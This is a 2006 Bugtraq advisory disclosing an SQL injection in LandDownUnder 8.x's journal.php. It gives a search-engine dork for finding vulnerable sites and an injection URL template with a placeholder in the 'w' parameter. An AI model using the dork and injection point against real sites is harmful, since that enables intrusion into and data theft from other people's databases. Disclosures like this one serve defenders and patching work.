bugtraq
[Top] [All Lists]

LDU <= 8.x (journal.php) SQL Injection Vulnerability

To: bugtraq@securityfocus.com
Subject: LDU <= 8.x (journal.php) SQL Injection Vulnerability
From: starext@msn.com
Date: 29 Dec 2006 16:26:21 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
# BhhGroup.Org & Trtekforum.com

#Found By  : St@rExT

# script name : LandDownUnder [LDU]

#Version : All

#Dork : "Powered by LDU"

# Script sites : http://www.neocrome.net

#Vull name  : LDU <= 8.x (journal.php) SQL Injection Vulnerability

# Vulnerable file : Journal.inc.php

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM 
$db_journals WHERE jrn_userid='$jrn_userid' AND 
jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w

#[SQL Vuln.] :

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]

#Contact: StareXt@msn.com

                  ######## - Tüm Müslüman insanlar&#305;n Bayram&#305;n&#305; 
Kutlar&#305;m.. : ) - #####

################### -  Ne Mutlu Türküm Diyene - ###################

<Prev in Thread] Current Thread [Next in Thread>
  • LDU <= 8.x (journal.php) SQL Injection Vulnerability, starext <=